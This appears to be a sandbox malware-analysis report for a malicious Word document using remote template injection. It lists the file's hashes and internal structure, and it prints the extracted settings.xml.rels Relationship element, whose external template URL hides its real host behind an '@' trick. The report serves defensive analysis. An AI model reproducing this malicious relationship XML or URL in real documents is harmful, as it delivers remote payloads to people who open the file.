Malicious
Malicious

943dd6fc2c077ea190b41e0285fec39f

MS Word Document
|
MD5: 943dd6fc2c077ea190b41e0285fec39f
|
Size: 60.24 KB
|
application/msword

Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Print
General
Structural Analysis
Config.1
Yara Rules9
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
943dd6fc2c077ea190b41e0285fec39f
Sha1
93c5495798845bc1eea76f1ce049772d3679abdf
Sha256
ebc21453a68e17f5c0620cfe2fdfd64097f78bdf165cb43d3c19bc15bd2d81e4
Sha384
3bc87cf0dcbee2c8942df68345bf883355cfe648ee2ae64c2a8e7a888fb5d440af509529878310f3a4bd236669eb8578
Sha512
91fcb0e1b49dc708b14067ff558321ec5a0e803dab5391f8eaa9bcd22085c86dbcd55fe163b4bad2b00a1dd758e6943476b32716250d4164c43a8e9d7f22d2e4
SSDeep
1536:kohgS4UkbPVhPwTmSypz4C1nYLOijq7xzLvG9KNrwgQyD2zeO9x:kbSGbTwXyN4Qn6PMzzGKMqXex
TLSH
4A43F169A2A104BAF502627757813268F72F75C7A213B70325326B6DCFF74C59AE420D
File Structure
943dd6fc2c077ea190b41e0285fec39f
Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
header2.xml.rels
Xml
footer2.xml.rels
Xml
settings.xml.rels
Xml
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
document.xml
Xml
footnotes.xml
Xml
footer2.xml
Xml
footer3.xml
Xml
header3.xml
Xml
endnotes.xml
Xml
header2.xml
Xml
media
image1.emf
image2.emf
embeddings
Microsoft_Office_Excel_Worksheet1.xlsx
Office Document
[Content_Types].xml
Xml
_rels
.rels
Xml
xl
_rels
workbook.xml.rels
Xml
workbook.xml
Xml
sharedStrings.xml
Xml
worksheets
_rels
sheet1.xml.rels
Xml
sheet1.xml
Xml
theme
theme1.xml
Xml
styles.xml
Xml
printerSettings
printerSettings1.bin
customXml
itemProps2.xml
Xml
_rels
item3.xml.rels
Xml
item2.xml.rels
Xml
item1.xml.rels
Xml
item1.xml
Xml
itemProps1.xml
Xml
itemProps3.xml
Xml
item3.xml
Xml
item2.xml
Xml
docProps
thumbnail.wmf
core.xml
Xml
app.xml
Xml
custom.xml
Xml
Microsoft_Office_Excel_Worksheet2.xlsx
Office Document
[Content_Types].xml
Xml
xl
_rels
workbook.xml.rels
Xml
workbook.xml
Xml
styles.xml
Xml
worksheets
sheet2.xml
Xml
sheet1.xml
Xml
theme
theme1.xml
Xml
sharedStrings.xml
Xml
printerSettings
printerSettings1.bin
docProps
thumbnail.wmf
core.xml
Xml
app.xml
Xml
custom.xml
Xml
theme
theme1.xml
Xml
settings.xml
Xml
styles.xml
Xml
webSettings.xml
Xml
fontTable.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://goodthingswithbestfeaturesnearlyneedforbestconfigurationfornetiretimewithme.docx@bersatu.me/LzvSc4
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://goodthingswithbestfeaturesnearlyneedforbestconfigurationfornetiretimewithme.docx@bersatu.me/LzvSc4" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://goodthingswithbestfeaturesnearlyneedforbestconfigurationfornetiretimewithme.docx@bersatu.me/LzvSc4
943dd6fc2c077ea190b41e0285fec39f (60.24 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙